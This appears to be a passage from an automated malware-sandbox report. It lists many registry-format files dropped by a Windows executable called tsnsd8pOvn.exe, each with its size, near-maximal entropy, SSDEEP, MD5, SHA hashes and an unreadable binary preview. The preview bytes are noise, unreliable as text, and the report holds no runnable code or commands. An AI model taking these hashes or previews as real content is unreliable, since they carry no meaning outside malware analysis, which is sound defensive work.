                              Preview:regf.........q.Wk...9......W.(..[8...:.@(..3o=....g2.....H,..-M....J..xW./.zg..m.@..^..G..-Z...h.P...nk...t.g..(.......,....nD..'.1'...^..Kj.#a4....c.....a..(A.....!~.+.$C.y..@cR._UH...q.^......Zk..`.....vVA.."....`.WhNK.^.(.....fp..=`c\'p...e......B.r...z.:..#_.:.>.K...K;8.....7...c$..c.l....E...0.2P-..?.n.....>..Z}@.././.....0>..B.$.R!.v~bOVT.P..$.#....S..a`v.....s...+.....}..g6.&..Mom.........&.C_.......pO.:.c.5...\.....l/.1.-m....D.d......1..........X4.o.0....0..s.....PS...8..Z...$.VQ|....'.1..?..,}}G.pX..fk......6..!L..w..O.5H..U....R&~q.........u...@;....&i......K..=....G{....h....T...l..^."e8.W._..FW.S...[.t..........FyRM....m>..6.s...m.....'.YJ<..s.G....M..qj....s+.5*.....p.c..K.CQ.....!T....Nh..Fg3......RQP...4.:O...W.K}.A+..'...b....q...{.....0...E..d..i.+#......{..5....~v..m.aM....O3.q.\iu..8.~.......R}.RV.q.J.rP,.2I.y..5.......&.....h.>Q.p.RD..D..Omf._*4n..M..J~.{ou.Gbr...Fe.<.'Q....W...n.X.k5./.....f.SH. ."...t-.....N...A..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977613725620308
                              Encrypted:false
                              SSDEEP:192:YayvNex4R3bPKEoGUN9Hb4TnOgfmuSKgq5NXCW1pkJvdLG+rX1JQeFf:YSx4RLPMjmnOgP/ZzXCJHGJq
                              MD5:525DF801135BCEF76DDF274934E4D167
                              SHA1:AB0FC78709C89FF8E45B929439017B79E44FADA3
                              SHA-256:E1D92F4D38BFF9A154DD1B8B4069CB76DB3691412D7F4AA41202628B6B0C9994
                              SHA-512:C512EE14F63AE5BAB1B2CB79DD5D1C793FF3C91F46017B0D4283A3CDD0708C21DB6345285E7E3E6C2FFAA174AE88EE274C959693EE0D26B2206F26B0B4F592E5
                              Malicious:false
                              Preview:regf...)|o.q.y....z...:.>p..=.7z8....\M..,.N....$..2.A<n.*....Z ....;~...8q...-..C.$......p..}...f..B...W.>...w.......~@B<.n..O...._d......w...k..:...a|...]...#%.Z.3.Y..g......vm......|....$.].d?..S.bl_.....).FJ....E..9.h........i/. _..."I.Q.u+..0Zv.ws.K..3.n.b*J+JO.G1j.:...B...#.......3....~B.g&..eh.p.N..'...e..c..U4> .d..<...$....e{..bz..q..k.._..].wD?i....M........x:.o..I.G.@.#@..^.p..s..4....=!....E...XykwX..Q.Fw.3F.s.....p...rH5&.1....x......B.O.~J.V...1.........|..F...+`L.r.....[...5...M.*6...C.r..f.r..?..E.TF.F.......:3?. ..%!....$.5.+u.*M.P).D.)?a.{d.a.w..[..1....J.D..%..o.......>.S.L.!..l...).J........o. .O%w....=..p5.[.. Z.....6z.A#.....VS..5.L.u..n&.|[V....rc..,.Qa.L..(Jc..c.fFC.Q..............r`....n...Y=...;........x..p.......u... ../...U56.z....q...d...-..p;:Y..F.O...iNVj48_....".V..g.<...%..^.M.g.. .M..5.....t....]..u....z.R}.+.....N.b...d.../.2.8.....en.....N$n.."1L./...Rl....@)..K..8..t.<HLH.c..b.Y]....Z&......;.....V3.a&..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978771143226834
                              Encrypted:false
                              SSDEEP:192:KFgNr+pLrTJ91b1ip8aFzXaQu7W5soDkWJdzeoZ1KNmaJHvf:MgYpVTbgJKhWyoAWvHKNmYH
                              MD5:75577371A092E44F0F36503A4F5B914C
                              SHA1:281CB35AA76ADFF26773D2780D69B31C2C4231A1
                              SHA-256:686BC09F53976E6212A0FFEAA4E59939D5EC4EBF0E8A8449CFD2C585F15B5623
                              SHA-512:50E0D1B982487A4AFBD5CAADA194A163AE9EEA22BB1C8662C1AE6BD40AA9BCCD8687B90890B94F8C5EB9906B569383B4F525FDC8B91CA747A9943307FC12C7A6
                              Malicious:false
                              Preview:regf.}..v8... .B.F.[.k.aw.......N.|..q..d8).......!..9[..NA....^?-wwv.._....M.....(....P.......R...S..O..^..%.|.L.....H.....!me..Q...O\.M.G]H....J..F.A..g.~.+..Fw.u.K5.l.COU.3...4..S...36......f...L....mb.(.....l..ap....V..M.....ZJs.q..I.2.d...<.t..M~.{.B.K.j..CRR........... f.....".i..a........3.=...t...>.".5.y.SX?.......vAa..p.....}..(&.g.\..?e..W.'B..#...?.ws9...2..fg.(V...m........y........s..w..........v`..........2y `h........i.q.M...Qs...?.J.*..<t=.{!z!8}*"..D6....SD.@..;.&1..Q\.&.Oi..Y.,F.G8.9...5.+.a. ...G....b*..3.^0.<.#.A.....A..i.Bf....5@...e..:..........~....a....%.A....<.....5..5.....FR.v>.......?...D6.9..../....Kf...2fT..x..w2...5<>.Q.O._H...=. .{z.X......k.>...h,..<...y..............5.AS..G..^..DY....?ND!...z.D..U..h.x.......(..FV.cG.7..l...X..4.V..h.hxl^...#.R.1%..f..1.x..|.!.........j..D6!..w..EN0.....i...g..h;.....=KG.Z9y........\d.`G.?.=..I.G/Z.'$D.%wk.....Y......oE.w...`...}4...1.....p. ....f._..Z..E...td.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977933519177336
                              Encrypted:false
                              SSDEEP:192:qwL/fw17YF0Wi87xFV+lH7UN9kUwexhlgYaPBOR8sWkxmWPyjxvekZf:vLnvPi80H7UXkU7RgXCdWyKN
                              MD5:50222DA22A20AB2A34A96C10666B762E
                              SHA1:0C505BAFFC9185E01A73EDCA436A0DB61468C735
                              SHA-256:269993160E5A6F6C1D9D7CE6A9E794AEC979024B738F68FDC12AB4836146BC66
                              SHA-512:C50E757B579AEFC05494A2EA712F99F248464BC220C0665DC7FABEA1B11B4FA1AD05EC080955D3D26B49C26B8753F282220C418A9C5FBF2030C123A7F302BA70
                              Malicious:false
                              Preview:regf.1..q.....e....l...t.#..^..}Rb.47f..=T.$g;w.y=....P.1b...Mg.y.....N`LO.s:..*L...;.........q.. ......N...E.Q$..5. .W.Vd.<7...9tcW..B=.~m.5..lz.m...A.^`..?.....x........U..T.qN..32....."..p.M.a./].....a."L...\.....9.~~.e<..P..;.0..C.=.nlQ..H.....m.U.W.......4}.8..6$.".,#..M2....k|....O.&wg..4.....:.s.Ya.,ma....L.U....(<.4.\...Q.o......dj..c.(...x?.V.b.*S...^C.<E.z....pw....Pt.c$.....T&..3...)._.C;.,.....f./.q*..\...I..q....k.@......P...m.*-...t..dp..../.;.f..]...x(...b.E.6._i..;..p.......G...]..._3..Z..N.$...@*O......x...j(YQ..l..}.&.5.....3Qb. .\AN........P:3oEh92....w.5.GH...P...m....8.{...t.....U.X.(.s...?.:/.7..0zU....#G.l@.z...J..1../.L*.nY.j.C..?.....ec".s..#............w.h.R........,KZ..{'.S...I....K..-.'.}..Z..qA&r.P2...n.>.-.mZ...@....Vl@.E...J.H~3l-.].....i.OP?,c....e..._.....M.&M......;.\I..N..M........(..V,.....ni...k.#.Wy5..l.....[0...b.4.'.?.p..U.."e...(>....8A...i....1mQ/.(@.s.z0.|/.......Wv..gn.S.........Lx.G(
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977445012154861
                              Encrypted:false
                              SSDEEP:192:++IKT99nJKyYrbqDEt+cVjXE0t6CScJa74fPyKWeyQEIeP0/3k53f:++IKp9nkyYrnhDLQ0yKWHQneP0/c
                              MD5:AE12E81976EB7A775723D82A95F713DB
                              SHA1:107B95DC5B3B6A6A8B78FED2CBA72710217A53B7
                              SHA-256:2872306858D75F20A24D94D6303512FDD4723CFFC6CA2AC99E64BA82737F2B2D
                              SHA-512:75C3ECE6487E8B450291BA850B526E96038F147762F1F5F05E242A4F5BD0BA7320933FD5DC0655BC2BC621FC8DB303B252461E0FCE28EFD20D4F4C7FD2EF9513
                              Malicious:false
                              Preview:regf...sI.R.Ur...j..."...a.:......|g.K.O..{.Wm8.s.N...&..u..<3..P.....,.....I...M.|_XB.-u..J.....a..^.X....$wL.3..p.R....6...4...=....0~...@N=..H..v..N..v.l......rW>...*'&l...........1.....R.e......i.<.........~..`.D...Z)..c5.e..e>.;.^....t.m........D...w....L...p......8m..q0.i...l.. [_|.....e...W....J.S..3.i.Z.*W!.Fi.....Q&U~D^%.[....(...\.7|&|M....y...t.!......U......C.yJ<...#.E..F.f{J.;i...[....<..p....LU..y.b..T7Q..f..c..Z.cn`..t..........L...o.JIRY_....?.^...]{..%3,~.y..........T..S.Q..Rs.N.P.2....@_.D.....M.\...e.c..?._qI.{.Bu..)Yd....F.........W.5=i2.8..2..:..)EL.IE...Jv...4^..']06...b.F.SM."..z..ek..,w`!.....G..W.n....PX..D.>......K...../...|.v.-sW.P.:....K.m...y<..8e.. 8m.;.......)..!.P...`..lD.|..1'...k8Jn...:.2..G.......yt....[.qv.I.Q>..p.k...>^.......!....E..=..q..DC.&..^.w.K..."."...3.[..".....@.,...3.9G'..$F>.`."'.v.{.(aL"..o..~...~f.s).H.7..7.#"..@by....1.c...,..c.GR..|..Yk...T.u.S..r.|..S....>..p...5......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9781027933724715
                              Encrypted:false
                              SSDEEP:192:CBuB3++hA9xM0Q6izv3VyrsnK508aEpQsCBy2l3u5fAVspjf:CM9cpi73VY1/bJ25yrb
                              MD5:9289B0876928CF7714ADAAEFBE0776AA
                              SHA1:375EB0EAF6A9C79E9FE71CDB22339D423B694105
                              SHA-256:FC928EC654680A3CCC969B7E641471F1FB95FE45016DB66D07F8488271A15FF9
                              SHA-512:B6A04212F34A5312E3D270D5518F66EBAC707D18F43D8B4BC4904A6ACA63C1CDC96723AC8A0F7925C1E76C5F695C561704F1FBCBB2CDB952D3E1C9B3E7408212
                              Malicious:false
                              Preview:regf....k,#...5.......W...+...9E..$....Z.XS....q.F....R..Gr..S...J..<K.W..q.Wb.A....wk.5.,.<9.....T.i.N%X.....V.</8.....o.0>..C(.....b..v.q.............I..>...ks}..IGQ.q.GK...l.....FO.N...<.......#k.8.+C9.l....jRI..._...z..)..SM.....&.............OLtQ.3..k.P...[.;.l....pmx.j.{.W..Cq......I.z(.<...v`.0/...`.......G..5...jj.....~.....~..9..@@b[.Q.<...*....g/...%....\...........P,.?E.e..'(.7...!.`MGF...2..G,?..y..H1../.E.......sd|....e..h..R.zH...n....>..E4 z..V............hq......od..,E.~U..-.._..=.{..v.e..$...1.......6.Dq.j..w_...hDN...S....`4...Dx.>.d.sw.Nm..~...l.y.....Gwp.....X..s..X.O..Y.(...M.....s+.0.........nur.Zyh.&n.dS.>&l.me.u<}.K....W.....l2@.EwQJt. .....y#........C....7.....v...p.~.....X....erlS.u...Y.0...nE...,.W]....75...o..X.. gL.....T....-........1\+.W..%.E...g$k.p...........<!.sA..-iZ".....8O(.X.UU.f=,U...}..l...7...q..R=..*.5m..4...5...7..T...6.....N+ ahN.v.hL+3..7?...&&....u.K. >...lR...2."...3.....H..7L..b|g....^|.=v.....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9774217208363885
                              Encrypted:false
                              SSDEEP:192:Smdkjg64zPYRURz+x6peWbUxSSSCO7Ai7hMZqFxKVh9fZTf:bS470U0djSvvKVvfZr
                              MD5:9AC9AE395FA2616AAD0452AEDBA7D2FF
                              SHA1:43729B5092529DDE5ED23DE139FBE1B62C6D929F
                              SHA-256:E91AE52A9DB4E33509549900C9CE2994F645C4C16DAEE449D2F5AC593BD48E6A
                              SHA-512:ED9BCB9D96AF56701D6BF55DCC10451C4C5394B418DFE3C876D4805E10152E6C675DC8BB9FE7F47AD2BD8FE0028C6A3B05FEEE4B7C93CC110C1C16EB8DE09E02
                              Malicious:false
                              Preview:regf....+[G.Y."O...%....E?.H.Y..$........Y..B...m ......>.....j...".X%.S...26..Xmp/..,...}.k.h#..F.H.m .R&....].N..#.V.y.<f..rgwg...P|..7.>...3h..)...)H.....;+>f<P.V^...V<.....de.L..e.Ae..F-.fuc..O...)......(:...~.1X>....Zr..kg".D......(.F.N}&P..[.].g*"Z_5\..%.$...")pd..........qsbg.E.U.q..w..8y.0h...*...C".....1X.fyv.2..)A.L..43...f..+W.%$~.A.."...K..X...U.-..P.o......@:...NLc.g93........>..e.2joO....7`...x.@2.`0a....l..u.~..3..+[.........R(.....T.......U.....;...aTX.V)W./.1......@.)3\.......Wb..1#.....~v>.....Vu..9V.W..;..oX..K.1...U...2x.,....W..r=.vM...[>#.E.......2..pc.n.cx@.dlh~.eb..A.\.Y..W...@Z.[..rF.,.6..y..-..`Rj.Nt..'.,.!.......d.....-..8..@F...d...AP.%....}Zl%.=s3t.S../.v.../N..4......W..4F...dXuf~....e..L`......._.J.'.>....I....0Vn..-....q..>.x0.B.M....tKS....<.XJ....n.I.....Q...H{]j.N.......'T.....c.l...J...T......J....'V....c.......w...l..7Z....6S:w...)EF.+x.[.._..b..4.B.f.%G.g}..GS..L.Hs\....4.P..I...j.lG.X...K....rf...._..X..sj..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979120320534451
                              Encrypted:false
                              SSDEEP:192:hc+iUBPGnCtLw+C1C8sTW95qUU5E0rNh1c+rQGXW/OWFZfe69eoN0xNImZ0qAYf:O0PXtZYwWDqTZrQn/OWFBeYekC2q0qAK
                              MD5:FED536C5E7851BB69C7AD40932A9E90F
                              SHA1:668177A018ADC331CA1F57101B54215F20AA9B9B
                              SHA-256:CE57B0B772CBD619BFC0FF391B078D6E9B97E0A54F43C88ADC678754156AB4CF
                              SHA-512:E02BB16CF9F310D36B8246D07E535F5075CF1637825C60DB2D7CC315C3E81BDE0CBEEDBA39C82885BE86647958F56208923BA9D3FA7E5D3CFD7D265C0E8BB4F0
                              Malicious:false
                              Preview:regf....u1JN.>.rv.aF.G.q........k......3. ...?.1.A..$..$*.rP....-.=!'._..(.......>..eBI.........bJ._...3..@*.zh.h... ...}/...A..=).3....J,6......Q...a".m.V..n.n'Q.b..R. ..........K..6..4...7Nc.....J.jg......)W..5....SU.}..7.h^....Io9?.2.[/<_..._.1.$V....&....|.Cm..r.&...H...N.... .duPF.,.T..u.'........s.....vj.6........=.W.JG..>.T....S..D.mR63...C.a<.Xf.}L.SU.."...B.g./V..f..n..I...I.......~u...T...Zy.....e...K....ab..r.D...~|##.....e......^c` i..[..Eu..>*...EB.`F4W...+..Z$.)j.F.o^.xe....K.h.2..D.+..Y...4.B2.gb.....`.2=[.:.!..ic.l..t...,..&yu.....Y....fK..#m......"...GG....Y.e....J....R9..V.v..]i.,.-#.......T^(.:. ..>..........*......)ZZ....nYxm...+.e.... ...... .....5.....m..j\j.`...Y.....;.@.....-......0IL..p...u...........uNO.....N....^_..B.6...zj.....Q..#.......I...f$i...... ..M.l....4.e'MV|-..\...=k....8p.....F.M.W....3.Z..G...g;f.XU..i...dYa...q]a..&h.C....G......&Z..S_...l.c..../{hQV..g.V.=..gd..Vk>kU....3...&..Lnk.s
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978811305703853
                              Encrypted:false
                              SSDEEP:192:0MePIDVvZ154H8/7R8OkBcgyuiObp022lEylVp5nS4df:r8kva8uOkPX12Z/r
                              MD5:CC972347D2F3197B63CD990DDB5D36FE
                              SHA1:8ED4B91F7178E6953A8AF82EF211652B47D0C2EE
                              SHA-256:B01E3482CEAADD699899D10930EF92F89944D4AE784AAFD957EA704098B1C8C7
                              SHA-512:1901C5D36FC2422458789C97253FF70E660AD1152218964D4D85494EAC7D00DA31A7DDC81C1C6CB27D26D195826AD1F588CDCC71BB5C243CC0EC7211C43550FB
                              Malicious:false
                              Preview:regf..0....5.,...%...iJ>..{....*....@.|...4..'.T.}.t.....~....g..E..R.z..c ZW4]T":...T..7\s...Q.k.......k..Ltu..3.e.ii./u............"...<d..u$I...OW...C.~!a@.U.....s..h....c.....+e.HWp.a*...z..A.v....SUB.l.U ;.b.^.......p....o9y,..+.n.c.p..........G..q...6..|TI^.N.x{..&'n..%+4J....u.`....F....!.9Mu.a"...R(^...,...S..U?....<...l..?.....`.[>.;K...[........4I.X...*\^)1&G1...A.-.RL..(_.Tp..ZaY........Y..Po.c..c6i.i.*.......ln=..X..F..EB.5M.t$.Z.N.}o.%....C.2.z....S.)6x.|...]<..q4.!Q.w:..zy{........"...K."iz.K~~..f..Lj.t.@XV......,FW.^{,#?b..RDs...4lo{$.Op..\.U.{?....o.......]X.g....{g$@...f=[.......:....u..MJ.%8.8p...H.V....rg@g?..E>C...]2.\..&w/...D..V.\..X..$..,...yOq.m=0..?)4....P..IG..s....>.q..j<.h.o.Pl...M...... .#g..s.%_.!nbF.k..._.Pq.9.e.T..J2.5>(E-.......z..g..s.....^oq<U..t.F;.ZYg. .`.~o....h..X..ws.....i4.X..yI.........$...uM_..a.1.*6...J7...1....\r.m-..E5..s.B.a.Q....T.Y..N..Q.-.!.3...../.Q....=.].e...ebw6.....wtv.E..\..H]
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9776932920944
                              Encrypted:false
                              SSDEEP:192:rzWyD9+y0dnhll1CSVkaw0t8i6BOhOAU74AwcFlsA/km7j8aYh/ugf:nhD9+fhAFan7iP774ATHsAMm7IaYhuy
                              MD5:964890F1D1FAF619FD7C2045275C0437
                              SHA1:3C9438633AD0FF2C6E6887D70866014381F7E206
                              SHA-256:1D96436EB4E0E35F65A1B0EB7701AA83082A2941B4C0FF79C08B1C8E19E3D558
                              SHA-512:9B9414666A1BAFE0C776C122BDA71309CDE066587F88FA1F65A61B2E1DD79FEFD6E99022964A60CA4A8DB20975591B45F95AE54DD009746E773ED588B7F6F675
                              Malicious:false
                              Preview:regf....a..._..DIyv.....q(.A.....Q".....;+.I.Yj..nO9......8fi.<...M........#.#;.S"..t..@......@...(u.-.....2YW.]..v.Q.......AO.N..../5.l.).L.V.L.....q.f-.Y........5[....oy.=..1.0C..c..Y.>....!.....<.92WK..g..`.j.7..'U...U...YMA.N..q.TJ.?.....6.a.a.|.d........=.TL<.1j...C.l>.. ...].0Os..2W.@..#..7/...J.\.7G*...F$Z|.0...R..e.t.Cx-.,....e?..$*X+.>.&.....H..S.qkk.....bw.].}-..{(H.p....o....0.......<....6..c..uX....hS..OIZ.W....w....n.. .,w....2F.5.WF....>uOk....Jb.l.8?....D.A>...7.d.).u5..M..+."KT.#.=..Ss..a..Z......b.=D..t.{o.,..4....E(.$TL...W..........@...f.g......Q..R.Dnm\!.....=.ZQ...........:H)..*....0#...`.........<..5jD.a.fK\j..'.V.._..-.Z...B=..R..CZ*.Q..W.e"...E..;..)F.%.r.];L.x.@...ctb].a..v&..)..dv?......_Y#@..Jh....H.y.%..n*.k^..!)E..$...F..3..j1.0...?#./.z.I.b.....M.K..<.......1..)X..K.e...de.=.r`^..%.......|....F.f...*.i....X:.....R.0.K....v.w|K"..r.......(g.....C..b]q.7u.....4.u..%.m}...==..E^..u.t.).....?v.3.j
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.979328356754564
                              Encrypted:false
                              SSDEEP:192:nZcWEMrg0cpMofVNpqgjTqv0fOFu2pEMiaPlkx/SOn3VhE4mMf:nZcSrgXpMo1qgjfOs2OMicKx/BnFhz
                              MD5:582B582A489833E2906DB08F5CD2BA4D
                              SHA1:350AD997433EC863582C1BF9A20DA0BDB61BA177
                              SHA-256:4CE95654199E106742A427CC47B03035DF24D49CFC805905C858C340CF5EC193
                              SHA-512:671210C582C50A464CBCA477F715F22330F690DB6BAFC4AA22B54243D7207DD59B4421FECE0EF0773E9A7E68A170E77FC71DE6A3E1581DC1D1F75EF7ECE9BBC8
                              Malicious:false
                              Preview:regf.#&/.n..Y-%...K..#Z.Qs........Lf/.rg.g@.t..T.P;....Xh..?BHq.....4h2...N8.ZE...7..l...@+G.xA..r.K..Kp8l..._Q"..H.....2.........sl&.....,...v)....}{..U.W.4 .qV....'.>.d.5O.A...E4..c.n.QR3X.....ii..4.d.l...T..?.o...ZG..;...]k7@....X.s,.......&l....4F.IVs\WK.4.Tb..1HAI.G:........"i...T...u.....?..t.Yn6...D...Y.l..b.Am....J)........V.C.].c..8I....~.0...:...E....I1V.B.U.kN...q...L..r.y.G.F`..0.QE..j.&V.^)s...D).S..Y...M....Q.|..x.I..<..WM...=......M.*V...{....?K.....#?.....n..]....Rp....a...N(..j1.,5.....<......0yP...D.H.>.-..N.".T:~e...7K.........:6.....'.t..jf....W.4...$.3.....T.i@;mm...:..m`. .,.2y..h...&..%.'.O..~R..g".(.1..Re.@5.+..}4./2.8V2.ew.vM".-O..d1Y.I.....@c..e......x....C....PsC.........~..1.4.......(^..MT.I..K\.}.m.Nr.u..Q..:O;.h...L.....Jg.&.W.....<.5...8w.l.j?..E...Ta..O.A...co...:.M.j.....t.\E.F.5.$...!..~.....N9.9.V.a.2k.-p3.T.U~....../E.%Dy4....eJO.L..%.Ca.1...@.-&.Q...9....l......m.s.96}6..{Q.X@......<<a.Y@.I#..m.,{
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9776545705520565
                              Encrypted:false
                              SSDEEP:192:RATEbEYPInN0kzIYlCNP7PK0Mun6rRCl+VPOQSNoR8qX88r5yf:RAT08nBjCNP7PNGRS+VGQSN68qMC5s
                              MD5:EEE0115BACE65527EB8F0D3EDA94CA7F
                              SHA1:B2A2A62B158966407CFD2C88679AD8A84A5C6ED6
                              SHA-256:D59F0813F59C052B006433FAC5E7BB927FB0A5EF4ACBCEF355D49F007BA2C52A
                              SHA-512:40EE502432CDA6AF54170CC9316E80ED6F1254F93A4BB52307945039B9A62A157CCEF22C4874B427970E389BFA9C7E942DC315EAF5A0B4C5965F0192005C68E8
                              Malicious:false
                              Preview:regf.`.-.$.......-h$.on.t. .7...P..J...<.k..>..R.0d.b....-.6.WH.z-|..SX$;.y.o,Jn........}*.9K.[....Y.Wor..[r.r..........9c*.:.R..r.8.........".).4.I#].....{..c.TH|v...X........!....B......;[:Q......M.+...?..n..?6..gs'.s.lQ...P\..@.d...`..,.^Ad...c...h..>i.B3.y....xk....4.<|..".l_Q..q...F*`......$.....<..!=.sA.ZA.C.j......(..../.^......<..#u.#......Z.+..b..P5.3l...6...9|..Kf...m.ai,r..I....f)ml.m=...h......*.R>....hx.T..#...@...Bw.)IB\....O....].TK.D.Z.......c....2.....kY.7E*{.}......D!....=....gdc.J.zTbZ:9(`.....]..$C.X....P..|...A.F.j....I....L..h...:#....5.T.....1...Gh....b&b.`.#Di.M..bP.P.F. ..(V.%Q.;Lik.J._.....c.*p...".w....EM.5[.K.T....M.......p.ds...8&.?..n..L$......=.S.S..".zJ.....q.J...A.3..m..q......"cQeK._..t..-..Aa...-...8....OH......\.l..ok.u...A...0.......D...........{U...v".....).a.n.%.j:.xUg....k....($,T..>.Xzc..J.%....(O..kOi...W..,....M.N...Q..7..&..b+...8...g..WG..P.g......W.....+;..j..7-t[..5...J.n.S...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.977083327267064
                              Encrypted:false
                              SSDEEP:192:kSE0FqiTKsZpucz43fAPl50YIFMtmfrkfnO0WmauVeKfG2uJ4tf:kSE0TTKIpuI+xqtmT2nO0Wml1fGK
                              MD5:38EB3757D0957A6E9F3A0A4A9623F37C
                              SHA1:44242485CDBE9D13EBA4E71845DD9EB85B32EDD0
                              SHA-256:350D262903462D83D91CF4A07D90FE4B5DF6CA39AC92FCDC9E87F32FF94317AD
                              SHA-512:53A59E9FA9224B8EA86CFEEA64C2A5D3D34F6465F9FCB747EF17FC9410FB3AB8DCE6EE63322941D316C3F396323276923903E7CD8D52C1583D59D2B4AA639215
                              Malicious:false
                              Preview:regf...#.=.@.z...].;....[G+g."r.p..........,....... ...Pp...o....D.tc.vp....b.L"&..c5i........=.y...qY..o3.."dZ&4-... .....L.D..i........Yg...nO..N.t*._....yc.-{...2...3...^.....x.-.o@..0"......`..Gc....t.>..0...r..`.S...C!...P.......p.c.kG....g1.O... .\...f....L.x.......b.[...}V./......Z..R.=.h.u#.... ......?1....a-*...c.R....,.....R......^;>...7.r.....y.%.3j...%.'.S+5......P..xkW....3|.3..J<..w..........|<...m.d...~..............G0.....!.!..b..h.`e.9..+q|nQ.p`..Y0.3A.".:^>..Kk..v=.GE..gK(8....z.>..U.....x%..p.gA..1f.$.....5.e..b.-.k..+5..@m(.>X./{.]A....h.:/..^.......B.. .+...C.\.5..1y..e..E*._.L6#.*aK..=...UW;^]......... s.:S.......)...&.$...0.b.Y...U..D.G.(...B......n..gB...1...7..,Ys..a..s...6.h..o.6..G..j..?.P.Oi*....e..i.mk+,Q......{wCe.K..h.6.._..2x#4.'E.a5..=^..b...YEDb...=.\...2.9$M..2...D.b{......Ut....byL..;J..."..e.....r..D.i^.;1NJV.v.cw.../..>....E...2.....p5W.ZW.k..XY`_H..o..|K...9v.R.4.yiWR...^..d...f.9.i.......XYq.D..8M..4...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975871762957494
                              Encrypted:false
                              SSDEEP:192:CjNhPKDq2TzhJSlc9Hji9tND2fm4BOXqaUbgBdQZOsmp8f:ItqX/Ocxjix4wYcB4N/
                              MD5:12F42F1847EB5E9A68ED12000CA7CCE0
                              SHA1:81D4DF3EF500A34A8FC2565D26C47C1CA13C29BC
                              SHA-256:01CFB262721D1BAF367DECF691774379386BCF7C41CA2631704CEC5D038DFC0B
                              SHA-512:464A7737EAAE45C501F19973B040FDB1FDB828449CE16940EECD79F30C791B2BE7B6B066B5A2A42B50A7EF9CFCC13E1FF07EA4609D62C42144ED9C64E2CAC645
                              Malicious:false
                              Preview:regf....L:K..}..,....h.x.E.R0.n.{..x,%w.+Z....S.^f.i$.y...p%.....r......... .q+=^.5...tm...H.$...R.....:U.).2M"...|.!1..........J..v.w.q..r...P..f<5q..dt..8.+f..Wh..P....\..."..!.m..(.XN.LA.f....S:.\Pp...F.e+r.B..8..._~....y^"..[....;....!......e..:._r...l.....0.f...V.....J!....ov\T".f..Y.{....M:kUi...... .....7.M...<.T>.n..Y.H...7.i......a.C.F.1.~.-x.e.~.*..h...s....=jUr"<.RB..e...@....;W..?i06..G2nq..Z.....2...7...Ht.=..Rq3....4Oh.$:...x~D...Y.....Hi......<.2.>.Ks.^...o.f%..au.?...6rl{..M.).6g..1.. $lj.zk..N.$.u.......,.>..y.E..wTj...O.F\G/3Ja.B....P.~.RZ..vjR.-u9....W.v...-...w~.u.1..V..:..o....~...s....dq.&...........m.]...(y...|......Tx.....QZx.Kx....vP....H...j.).Q..f..L....hc.....#BCX.F..&.%..=......H..z....O.......&..c...`....om.2..U........CP.f5S..4..j.0..[..oX.M...)e.B.j......,..Jr...]....E...k....}.3...w&{v..L..].%p.. tkz....y,Ym_...._m..yx66v|+.?Fws.M..Y.}k..A.9...g.B.........-<(...$Z...Zqw..o._i.v.^..>}.*...Q...a..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9781250809102096
                              Encrypted:false
                              SSDEEP:192:nd43oI/2SJtnL8TCgLzftZHO8UJFQhkLD/kVFkf:d44IeUC1lnUJaFG
                              MD5:B101A97B81C615962E5FFC714EA53C47
                              SHA1:B68096E34D8B1FDBFF9D6C13647FB45650509CE5
                              SHA-256:EDA8E5CBE4CAB3093ED83D1D3471E03E08931547B8CA24DB0D62E0DFC672AC9D
                              SHA-512:4FA41F45C5502FEB2DED169BF890CAACE202DC6F790E66D448E733FFF085DA262660190CE82A66ED5E16236B24BB05F794AD757AF893886E80627B879873248C
                              Malicious:false
